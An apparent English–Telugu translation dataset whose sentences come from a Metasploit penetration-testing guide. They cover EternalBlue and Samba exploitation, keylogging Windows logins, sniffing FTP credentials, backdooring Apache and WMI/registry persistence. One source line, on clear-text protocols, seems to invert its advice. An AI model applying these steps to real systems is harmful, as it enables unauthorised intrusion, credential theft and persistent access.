{"en":"To display the help menu, simply type the help command inside msfconsole.","translation":"సహాయ మెనుని ప్రదర్శించడానికి, msfconsole లోపల సహాయం కమాండ్ టైప్ చేయండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Probably the most helpful command to start with is the search command.","translation":"ప్రారంభించడానికి బహుశా అత్యంత సహాయకరమైన కమాండ్ సెర్చ్ కమాండ్.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Linux is one of the most widely used operating systems.","translation":"Linux అత్యంత విస్తృతంగా ఉపయోగించే ఆపరేటింగ్ సిస్టమ్‌లలో ఒకటి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"We will be using the Metasploitable 2, for our vulnerable Linux machine in this recipe.","translation":"ఈ వంటకంలో, మేము మా బలహీనమైన లైనక్స్ మెషిన్ కోసం మెటాస్ప్లోయిటబుల్ 2 ని ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"First, will use the services command to display the results from our previous nmap scan.","translation":"ముందుగా, మేము మా మునుపటి nmap స్కాన్ నుండి ఫలితాలను ప్రదర్శించడానికి సర్వీసెస్ కమాండ్ ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we know the version of the Samba daemon running, we can search for vulnerabilities.","translation":"సరిగ్గా నడుస్తున్న Samba డీమన్ వెర్షన్ తెలిసిన తర్వాత, మేము బలహీనతలను శోధించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Using the search command and filtering by CVE, setting the type to display only exploits and the keyword samba, we get a couple of exploits.","translation":"సెర్చ్ కమాండ్ ఉపయోగించి మరియు CVE ద్వారా ఫిల్టర్ చేయడం ద్వారా, రకాన్ని ఎక్స్‌ప్లాయిట్‌లను మాత్రమే ప్రదర్శించడానికి మరియు samba అనే కీలక పదాన్ని సెట్ చేయడం ద్వారా, మేము కొన్ని ఎక్స్‌ప్లాయిట్‌లను పొందుతాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To select the exploit, employ the use command followed by the exploit name.","translation":"ఎక్స్‌ప్లాయిట్‌ను ఎంచుకోవడానికి, ఎక్స్‌ప్లాయిట్ పేరుతో పాటు ఉపయోగించే కమాండ్‌ను ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The info command with the -f option shows the information in a markdown version with a browser.","translation":"–f ఎంపికతో సమాచారం బ్రౌజర్‌తో మార్క్‌డౌన్ వెర్షన్‌లో సమాచారాన్ని చూపుతుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"The C:\\Users\\Public\\Documents\\jack_of_hearts.docx file gets downloaded in the root folder of our attacking machine.","translation":"C:\\Users\\Public\\Documents\\jack_of_hearts.docx ఫైల్ మా దాడి చేసే యంత్రం యొక్క రూట్ ఫోల్డర్లో డౌన్లోడ్ చేయబడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Similarly, we can use the upload command to send any file to the target machine.","translation":"అదేవిధంగా, మేము ఏదైనా ఫైల్‌ను లక్ష్య యంత్రానికి పంపడానికి అప్‌లోడ్ ఆదేశాన్ని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To remove a file or a directory from the target machine, we can use the rm command.","translation":"లక్ష్య యంత్రం నుండి ఫైల్ లేదా డైరెక్టరీని తీసివేయడానికి, మేము rm ఆదేశాన్ని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Editing files using Meterpreter can be done by using the edit command, which uses vim.","translation":"మీటర్ప్రెటర్ని ఉపయోగించి ఫైల్లను సవరించడం ఎడిట్ కమాండ్ని ఉపయోగించడం ద్వారా చేయవచ్చు, ఇది విమ్‌ని ఉపయోగిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"One of my favorite commands is the show_mount command, which allows you to list all mount points/logical drives in the target system.","translation":"నాకు ఇష్టమైన ఆదేశాలలో ఒకటి show_mount కమాండ్, ఇది లక్ష్య వ్యవస్థలోని అన్ని మౌంట్ పాయింట్లు/లాజికల్ డ్రైవ్లను జాబితా చేయడానికి మిమ్మల్ని అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To display all the available commands, you can use the help command followed by the group of commands you want to display.","translation":"అందుబాటులో ఉన్న అన్ని ఆదేశాలను ప్రదర్శించడానికి, మీరు సహాయం ఆదేశాన్ని ఉపయోగించవచ్చు, ఆ తర్వాత మీరు ప్రదర్శించాలనుకుంటున్న ఆదేశాల సమూహం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Meterpreter gives us complete access to the target machine by setting up an interactive command prompt.","translation":"మీటర్ప్రెటర్ ఒక ఇంటరాక్టివ్ కమాండ్ ప్రాంప్ట్‌ను ఏర్పాటు చేయడం ద్వారా లక్ష్య యంత్రానికి పూర్తి యాక్సెస్‌ను అందిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can also drop a shell session to work in the default Windows DOS mode, but it will not have as many functionalities.","translation":"మేము డిఫాల్ట్ విండోస్ DOS మోడ్‌లో పని చేయడానికి షెల్ సెషన్‌ను కూడా వదలవచ్చు, కానీ ఇది చాలా కార్యాచరణలను కలిగి ఉండదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This was a quick reference to some of the important filesystem commands of Meterpreter.","translation":"ఇది మీటర్ప్రెటర్ యొక్క కొన్ని ముఖ్యమైన ఫైల్‌సిస్టమ్ ఆదేశాలకు శీఘ్ర సూచన.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"In the next recipe, we will look at a very interesting Meterpreter command called timestomp.","translation":"తదుపరి రెసిపీలో, మేము టైమ్‌స్టంప్ అనే చాలా ఆసక్తికరమైన మీటర్ప్రెటర్ కమాండ్ను చూస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Meterpreter provides us with some useful networking commands as well.","translation":"మీటర్ప్రెటర్ కూడా కొన్ని ఉపయోగకరమైన నెట్‌వర్కింగ్ ఆదేశాలను అందిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"These commands can be useful in understanding the network structure of the target user.","translation":"లక్ష్య వినియోగదారు యొక్క నెట్‌వర్క్ నిర్మాణాన్ని అర్థం చేసుకోవడానికి ఈ ఆదేశాలు ఉపయోగపడతాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can analyze whether the system belongs to a LAN or if it is a standalone system.","translation":"సిస్టమ్ LANకి చెందుతుందా లేదా ఇది స్వతంత్ర సిస్టమ్‌గా ఉందో మనం విశ్లేషించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can also find out the IP range, DNS, and other information.","translation":"మేము IP పరిధి, DNS మరియు ఇతర సమాచారాన్ని కూడా తెలుసుకోవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Such network information can be useful when we have to perform pivoting.","translation":"పివోటింగ్ చేయవలసి వచ్చినప్పుడు అటువంటి నెట్‌వర్క్ సమాచారం ఉపయోగపడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Pivoting is a concept by which we can compromise other machines on the same network in which our target is present.","translation":"పివోటింగ్ అనేది ఒక భావన, దీని ద్వారా మన లక్ష్యం ఉన్న అదే నెట్‌వర్క్‌లోని ఇతర యంత్రాలను రాజీ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Subnetting is done to increase the address utility and security.","translation":"చిరునామా యుటిలిటీ మరియు భద్రతను పెంచడానికి సబ్‌నెట్టింగ్ చేయబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"A netmask is a 32-bit mask that is used to divide an IP address into subnets and specify the network's available hosts.","translation":"నెట్‌మాస్క్ అనేది 32-బిట్ మాస్క్, ఇది IP చిరునామాను సబ్‌నెట్‌లుగా విభజించడానికి మరియు నెట్‌వర్క్ యొక్క అందుబాటులో ఉన్న హోస్ట్‌లను పేర్కొనడానికి ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The gateway specifies the forwarding or the next hop IP address over which the set of addresses defined by the network destination and subnet mask are reachable.","translation":"గేట్‌వే ఫార్వార్డింగ్ లేదా నెట్‌వర్క్ గమ్యం మరియు సబ్‌నెట్ మాస్క్ ద్వారా నిర్వచించబడిన చిరునామాల సమితి చేరుకోగల తదుపరి హాప్ IP చిరునామాను పేర్కొంటుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"There are several networking commands provided by Meterpreter, which we can display using the help command followed by net for the network.","translation":"మీటర్ప్రెటర్ అందించిన అనేక నెట్‌వర్కింగ్ ఆదేశాలు ఉన్నాయి, వీటిని నెట్‌వర్క్ కోసం నెట్‌తో పాటు సహాయం ఆదేశాన్ని ఉపయోగించి ప్రదర్శించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If you have to sniff the login password, you will have to change the active desktop to Session 0/WinSta0/Winlogon.","translation":"మీరు లాగిన్ పాస్‌వర్డ్‌ను స్నిఫ్ చేయవలసి వస్తే, మీరు యాక్టివ్ డెస్క్‌టాప్‌ను సెషన్ 0/WinSta0/Winlogonకి మార్చాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Let's check our current desktop using the getdesktop command.","translation":"getdesktop కమాండ్ ఉపయోగించి మన ప్రస్తుత డెస్క్‌టాప్‌ను తనిఖీ చేద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"So, if we run a keystroke capture here, it won't return any result.","translation":"కాబట్టి, మనం ఇక్కడ కీస్ట్రోక్ క్యాప్చర్ రన్ చేస్తే, అది ఎటువంటి ఫలితాన్ని ఇవ్వదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Let's change our desktop to WinSta0\\Default.","translation":"మన డెస్క్‌టాప్‌ను WinSta0\\Defaultకి మారుద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The preceding command line shows that we moved to the interactive Windows desktop station by using the setdesktop command.","translation":"మునుపటి కమాండ్ లైన్ సెట్‌డెస్క్‌టాప్ కమాండ్ ఉపయోగించి, మేము ఇంటరాక్టివ్ విండోస్ డెస్క్‌టాప్ స్టేషన్‌కు ఎలా వెళ్ళామో చూపిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"So, now we are ready to run a keystroke sniffer to capture the keys pressed by the user on the target machine.","translation":"కాబట్టి, ఇప్పుడు మనం లక్ష్య యంత్రంలో వినియోగదారు నొక్కిన కీలను సంగ్రహించడానికి కీస్ట్రోక్ స్నిఫర్‌ను అమలు చేయడానికి సిద్ధంగా ఉన్నాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Dumping captured keystrokes... gmail.com<CR> demouser<Right Shift>@gmail.com<CR> <Right Shift>P4ssw0rd<CR>","translation":"సంగ్రహించిన కీస్ట్రోక్‌లను డంప్ చేస్తోంది... gmail.com<CR> demouser<Right Shift>@gmail.com<CR> <Right Shift>P4ssw0rd<CR>","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"What if you want to sniff the Windows login password?","translation":"మీరు విండోస్ లాగిన్ పాస్‌వర్డ్‌ను స్నిఫ్ చేయాలనుకుంటే ఏమి చేయాలి?","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Obviously, you can switch your active desktop to WinSta0\\Winlogon using the setdesktop command, but here we will discuss an alternate approach as well.","translation":"ఖచ్చితంగా, మీరు సెట్‌డెస్క్‌టాప్ కమాండ్ ఉపయోగించి మీ యాక్టివ్ డెస్క్‌టాప్‌ను WinSta0\\Winlogonకి మార్చవచ్చు, కాని ఇక్కడ మేము ప్రత్యామ్నాయ విధానాన్ని కూడా చర్చిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can migrate to a process which runs during the Windows login.","translation":"విండోస్ లాగిన్ సమయంలో నడుస్తున్న ఒక ప్రక్రియకు మనం వలస వెళ్ళవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Let's execute the ps command to check the running processes.","translation":"నడుస్తున్న ప్రక్రియలను తనిఖీ చేయడానికి ps కమాండ్ అమలు చేద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"You will find winlogon.exe running as a process with a process ID.","translation":"మీరు winlogon.exeని ప్రాసెస్ IDతో ఒక ప్రక్రియగా నడుస్తున్నట్లు కనుగొంటారు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now, let's migrate to this PID and check our active desktop again.","translation":"ఇప్పుడు, ఈ PIDకి వలస వెళ్లి, మళ్ళీ మన యాక్టివ్ డెస్క్‌టాప్‌ను తనిఖీ చేద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"You can see that our active desktop has changed to WinSta0\\Winlogon.","translation":"మన యాక్టివ్ డెస్క్‌టాప్ WinSta0\\Winlogonకి మారిందని మీరు చూడవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Now, we can run the keyscan_start command to start sniffing the keystrokes on the Windows login screen.","translation":"ఇప్పుడు, విండోస్ లాగిన్ స్క్రీన్‌పై కీస్ట్రోక్‌లను స్నిఫ్ చేయడం ప్రారంభించడానికి మనం keyscan_start కమాండ్‌ను అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To capture the login password, log into the Metasploitable 3 machine and then use the keyscan_dump Meterpreter command to dump the keystrokes.","translation":"లాగిన్ పాస్‌వర్డ్‌ను సంగ్రహించడానికి, Metasploitable 3 మెషీన్‌లో లాగిన్ అవ్వండి, ఆపై కీస్ట్రోక్‌లను డంప్ చేయడానికి keyscan_dump Meterpreter కమాండ్‌ను ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Similarly, we can get back to the Default desktop by migrating to any process which is running on the default desktop; for example, explorer.exe.","translation":"అదేవిధంగా, డిఫాల్ట్ డెస్క్‌టాప్‌లో నడుస్తున్న ఏదైనా ప్రాసెస్‌కు వలస వెళ్లడం ద్వారా మనం డిఫాల్ట్ డెస్క్‌టాప్‌కు తిరిగి రావచ్చు; ఉదాహరణకు, explorer.exe.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Generally, people do not get any results when they directly run keyscan without having a look at the current active desktop.","translation":"సాధారణంగా, ప్రస్తుత యాక్టివ్ డెస్క్‌టాప్‌ను చూడకుండా నేరుగా కీస్కాన్‌ను అమలు చేసినప్పుడు ప్రజలకు ఎటువంటి ఫలితాలు రావు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"This is because the process they have penetrated might belong to a different session or station.","translation":"ఎందుకంటే వారు చొచ్చుకుపోయిన ప్రక్రియ వేరే సెషన్ లేదా స్టేషన్‌కు చెందినది కావచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"So keep this concept in mind while working with keystroke sniffing.","translation":"కీస్ట్రోక్ స్నిఫింగ్‌తో పని చేస్తున్నప్పుడు ఈ భావనను గుర్తుంచుకోండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To generate some traffic, we will log in to the Metasploitable 3 machine.","translation":"కొంత ట్రాఫిక్‌ను ఉత్పత్తి చేయడానికి, మేము మెటాస్ప్లోయిటబుల్ 3 మెషీన్‌లో లాగిన్ అవుతాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Then, we will stop the sniffer using the sniffer_stop 3 command.","translation":"అప్పుడు, మేము sniffer_stop 3 కమాండ్ ఉపయోగించి స్నిఫర్‌ను ఆపివేస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Download the PCAP using the sniffer_dump 3 command.","translation":"sniffer_dump 3 కమాండ్ ఉపయోగించి PCAPని డౌన్‌లోడ్ చేయండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Now that we have the PCAP file, we can use tcpdump, a packet analyzer command-line tool.","translation":"ఇప్పుడు మన దగ్గర PCAP ఫైల్ ఉంది, మనం ప్యాకెట్ అనలైజర్ కమాండ్-లైన్ సాధనమైన tcpdumpని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Looking at the output, we can see that we were able to capture the FTP credentials.","translation":"అవుట్‌పుట్‌ను చూస్తే, మేము FTP ఆధారాలను సంగ్రహించగలిగామని చూడవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This is the reason why you should use clear text protocols, such as FTP and Telnet.","translation":"మీరు FTP మరియు Telnet వంటి స్పష్టమైన టెక్స్ట్ ప్రోటోకాల్‌లను ఎందుకు ఉపయోగించాలో ఇది కారణం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"You might have realized the important role of Meterpreter to make our penetration task easier and faster.","translation":"మన చొరబాటు పనిని సులభతరం చేయడానికి మరియు వేగవంతం చేయడానికి మీటర్ప్రెటర్ యొక్క ముఖ్యమైన పాత్రను మీరు గ్రహించి ఉండవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"We will dive deeper into the core of Metasploit to understand how Meterpreter scripts function.","translation":"మీటర్ప్రెటర్ స్క్రిప్ట్‌లు ఎలా పనిచేస్తాయో అర్థం చేసుకోవడానికి మేము మెటాస్ప్లోయిట్ యొక్క కోర్‌లోకి లోతుగా వెళ్తాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"From a penetration tester's point of view, it is essential to know how to implement our own scripting techniques.","translation":"చొరబాటు పరీక్షకుడి కోణం నుండి, మన స్వంత స్క్రిప్టింగ్ పద్ధతులను ఎలా అమలు చేయాలో తెలుసుకోవడం చాలా అవసరం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"There can be situations when you have to perform tasks where Meterpreter may not be enough.","translation":"మీరు మీటర్ప్రెటర్ సరిపోని పనులను నిర్వహించాల్సిన పరిస్థితులు ఉండవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This is where developing our own scripts and modules come in handy.","translation":"ఇక్కడే మన స్వంత స్క్రిప్ట్‌లు మరియు మాడ్యూల్స్‌ను అభివృద్ధి చేయడం ఉపయోగపడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The Meterpreter API can be helpful for programmers to implement their own scripts.","translation":"ప్రోగ్రామర్‌లు వారి స్వంత స్క్రిప్ట్‌లను అమలు చేయడానికి మీటర్ప్రెటర్ API సహాయకరంగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We will be dealing with Ruby scripts in the next few recipes.","translation":"మేము తదుపరి కొన్ని వంటకాల్లో రూబీ స్క్రిప్ట్‌లతో వ్యవహరిస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Let's start by launching an interactive Ruby shell with Meterpreter.","translation":"మీటర్ప్రెటర్‌తో ఇంటరాక్టివ్ రూబీ షెల్‌ను ప్రారంభించడం ద్వారా ప్రారంభిద్దాం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Now that we are in the Ruby shell, we can execute our Ruby scripts.","translation":"ఇప్పుడు మనం రూబీ షెల్‌లో ఉన్నాము, మనం మన రూబీ స్క్రిప్ట్‌లను అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Let's use the framework object and display information about our session.","translation":"ఫ్రేమ్‌వర్క్ వస్తువును ఉపయోగిద్దాం మరియు మా సెషన్ గురించి సమాచారాన్ని ప్రదర్శిద్దాం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Use client to display information about our target machine.","translation":"మా లక్ష్య యంత్రం గురించి సమాచారాన్ని ప్రదర్శించడానికి క్లయింట్‌ని ఉపయోగించండి.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"This call will print the output and add a carriage return at the end.","translation":"ఈ కాల్ అవుట్‌పుట్‌ను ప్రింట్ చేస్తుంది మరియు చివరిలో క్యారేజ్ రిటర్న్‌ను జోడిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"This call is used most often in the scripting language.","translation":"ఈ కాల్ స్క్రిప్టింగ్ భాషలో చాలా తరచుగా ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Railgun is an extension for Meterpreter that allows us to make calls to a Windows API.","translation":"రైల్‌గన్ అనేది మీటర్ప్రెటర్ కోసం ఒక పొడిగింపు, ఇది విండోస్ APIకి కాల్స్ చేయడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Checking target architecture...","translation":"లక్ష్య ఆర్కిటెక్చర్ ను తనిఖీ చేస్తోంది...","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Since the target doesn't have a root password, it is possible to use the MySQL service to upload a shell and gain remote access to the system.","translation":"లక్ష్యం రూట్ పాస్‌వర్డ్ కలిగి లేనందున, షెల్ను అప్‌లోడ్ చేయడానికి మరియు సిస్టమ్‌కు రిమోట్ యాక్సెస్ పొందడానికి MySQL సేవను ఉపయోగించడం సాధ్యమవుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This vulnerability affects Windows machines without security update MS17-010 for Microsoft Windows SMB Server SMBv1 Server.","translation":"ఈ బలహీనత Microsoft Windows SMB సర్వర్ SMBv1 సర్వర్ కోసం MS17-010 భద్రతా నవీకరణ లేని Windows యంత్రాలను ప్రభావితం చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To launch the exploit, use the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module, set the target IP address, use a meterpreter reverse TCP payload, and specify the listening address:","translation":"ఎక్స్‌ప్లాయిట్‌ను ప్రారంభించడానికి, MS17-010 EternalBlue SMB రిమోట్ విండోస్ కెర్నల్ పూల్ కరప్షన్ ఎక్స్‌ప్లాయిట్ మాడ్యూల్‌ను ఉపయోగించండి, లక్ష్య IP చిరునామాను సెట్ చేయండి, మీటర్ ప్రింటర్ రివర్స్ TCP పేలోడ్‌ను ఉపయోగించండి మరియు వినడానికి చిరునామాను పేర్కొనండి:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"One outcome of a penetration test that differentiates it from a vulnerability scanner, is that no one will state that what you've found is a false positive when you present them with a screenshot of a shell running on the target system.","translation":"ఒక చొచ్చుకుపోయే పరీక్ష యొక్క ఫలితం ఏమిటంటే, బలహీనత స్కానర్ నుండి ఇది భిన్నంగా ఉంటుంది, మీరు లక్ష్య వ్యవస్థలో నడుస్తున్న షెల్ యొక్క స్క్రీన్ షాట్‌ను వారికి సమర్పించినప్పుడు మీరు కనుగొన్నది తప్పుడు సానుకూలమని ఎవరూ చెప్పరు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Having a shell on the target system is great, but sometimes it is not enough.","translation":"లక్ష్య వ్యవస్థలో షెల్ కలిగి ఉండటం గొప్పది, కానీ కొన్నిసార్లు అది సరిపోదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With a backdoor, we will be able to ensure persistence and get access to the system, even if the vulnerability gets patched.","translation":"ఒక బ్యాక్‌డోర్‌తో, బలహీనతను పరిష్కరించినప్పటికీ, మేము స్థిరత్వాన్ని నిర్ధారించగలుగుతాము మరియు సిస్టమ్‌కు యాక్సెస్ పొందగలుగుతాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Since we cannot backdoor a binary while it is running, the first thing we need to do is to kill the Apache process (httpd.exe), using the kill command followed by the PID of the process:","translation":"ఒక బైనరీని అది నడుస్తున్నప్పుడు బ్యాక్‌డోర్ చేయలేనందున, మనం చేయవలసిన మొదటి పని ఏమిటంటే, ప్రాసెస్ యొక్క PID ద్వారా అనుసరించబడే కిల్ కమాండ్ ఉపయోగించి Apache ప్రాసెస్‌ను (httpd.exe) చంపడం:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To backdoor the service, we will use msfconsole, with a reverse TCP.","translation":"సేవను బ్యాక్‌డోర్ చేయడానికి, మేము రివర్స్ TCPతో msfconsoleని ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we have the backdoor ready, we need to start a listener for the reverse connection; for that we will use the Generic Payload Handler:","translation":"ఇప్పుడు మేము బ్యాక్‌డోర్‌ను సిద్ధం చేసినందున, మేము రివర్స్ కనెక్షన్ కోసం శ్రోతను ప్రారంభించాలి; దాని కోసం మేము జెనరిక్ పేలోడ్ హ్యాండ్లర్‌ను ఉపయోగిస్తాము:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Back in the session, we will rename the httpd.exe file to httpd.exe.backup, upload the backdoored version, and rename it to httpd.exe:","translation":"సెషన్‌లో తిరిగి, మేము httpd.exe ఫైల్‌ను httpd.exe.backupగా మారుస్తాము, బ్యాక్‌డోర్ చేసిన వెర్షన్‌ను అప్‌లోడ్ చేస్తాము మరియు దానికి httpd.exe అని పేరు పెడతాము:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Then, we will drop into a system command shell, and use the net stop command to stop the wampapache and net start to start it up again:","translation":"అప్పుడు, మేము సిస్టమ్ కమాండ్ షెల్‌లోకి దిగుతాము మరియు wampapacheని ఆపడానికి నెట్ స్టాప్ కమాండ్ మరియు దాన్ని మళ్లీ ప్రారంభించడానికి నెట్ స్టార్ట్ ఉపయోగిస్తాము:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To use the Windows Registry Only Persistence module, we need to specify the session to run the module on, in this case, session 1 with what we got from the MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit; set the payload; set the listening IP address; and use the exploit command to launch the exploit:","translation":"విండోస్ రిజిస్ట్రీ ఓన్లీ పెర్సిస్టెన్స్ మాడ్యూల్‌ను ఉపయోగించడానికి, మేము మాడ్యూల్‌ను అమలు చేయడానికి సెషన్‌ను పేర్కొనాలి, ఈ సందర్భంలో, MS17-010 EternalBlue SMB రిమోట్ విండోస్ కెర్నల్ పూల్ కరప్షన్ ఎక్స్‌ప్లాయిట్ నుండి మనం పొందిన వాటితో సెషన్ 1; పేలోడ్‌ను సెట్ చేయండి; వినడానికి IP చిరునామాను సెట్ చేయండి; మరియు ఎక్స్‌ప్లాయిట్‌ను ప్రారంభించడానికి ఎక్స్‌ప్లాయిట్ కమాండ్ ఉపయోగించండి:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To trigger the exploit, simply reboot the Metasploitable 3 machine and we will get a new session:","translation":"ఎక్స్‌ప్లాయిట్‌ను ట్రిగ్గర్ చేయడానికి, మెటాస్ప్లోయిటబుల్ 3 మెషీన్‌ను పునఃప్రారంభించండి మరియు మేము కొత్త సెషన్‌ను పొందుతాము:","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To use the WMI Event Subscription Persistence local exploit module, we first need to specify the session to run the module on.","translation":"WMI ఈవెంట్ సబ్‌స్క్రిప్షన్ పెర్సిస్టెన్స్ లోకల్ ఎక్స్‌ప్లాయిట్ మాడ్యూల్‌ను ఉపయోగించడానికి, మేము మొదట మాడ్యూల్‌ను అమలు చేయడానికి సెషన్‌ను పేర్కొనాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Then, we will set up our listener, using the Generic Payload Handler module so that the next time the user logs in to the machine, we will get a new session using our WMI backdoor:","translation":"అప్పుడు, మేము మా శ్రోతను ఏర్పాటు చేస్తాము, జెనరిక్ పేలోడ్ హ్యాండ్లర్ మాడ్యూల్‌ను ఉపయోగించి, తదుపరిసారి వినియోగదారుడు మెషీన్‌లోకి లాగిన్ అయినప్పుడు, మేము మా WMI బ్యాక్‌డోర్‌ను ఉపయోగించి కొత్త సెషన్‌ను పొందుతాము:","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"A Denial of Service (DoS) attack denies legitimate users access to computer services (or resources), usually by overloading the service with requests or by exploiting vulnerabilities, resulting in a degradation of performance, and possibly crashing the service or even the operating system.","translation":"సేవా నిరాకరణ (DoS) దాడి సాధారణంగా అభ్యర్థనలతో సేవను ఓవర్‌లోడ్ చేయడం లేదా బలహీనతలను ఉపయోగించడం ద్వారా చట్టబద్ధమైన వినియోగదారులను కంప్యూటర్ సేవలను (లేదా వనరులను) యాక్సెస్ చేయకుండా నిరోధిస్తుంది, దీని ఫలితంగా పనితీరు క్షీణత ఏర్పడుతుంది మరియు బహుశా సేవ లేదా ఆపరేటింగ్ సిస్టమ్‌ను కూడా క్రాష్ చేస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Before using the SMBLoris NBSS Denial of Service auxiliary DoS module, we need to use the ulimit command to set the maximum number of open file descriptors to 65535, so we can handle simultaneous connections:","translation":"SMBLoris NBSS సేవా నిరాకరణ సహాయక DoS మాడ్యూల్‌ను ఉపయోగించే ముందు, మనం ulimit కమాండ్‌ను ఉపయోగించి గరిష్ట సంఖ్యలో ఓపెన్ ఫైల్ డిస్క్రిప్టర్‌లను 65535కి సెట్ చేయాలి, తద్వారా మేము ఏకకాల కనెక్షన్‌లను నిర్వహించగలము:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"We can launch msfconsole with the -q option, so it does not print the banner on startup.","translation":"ప్రారంభంలో బ్యానర్‌ను ముద్రించకుండా ఉండటానికి, మేము -q ఎంపికతో msfconsoleని ప్రారంభించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
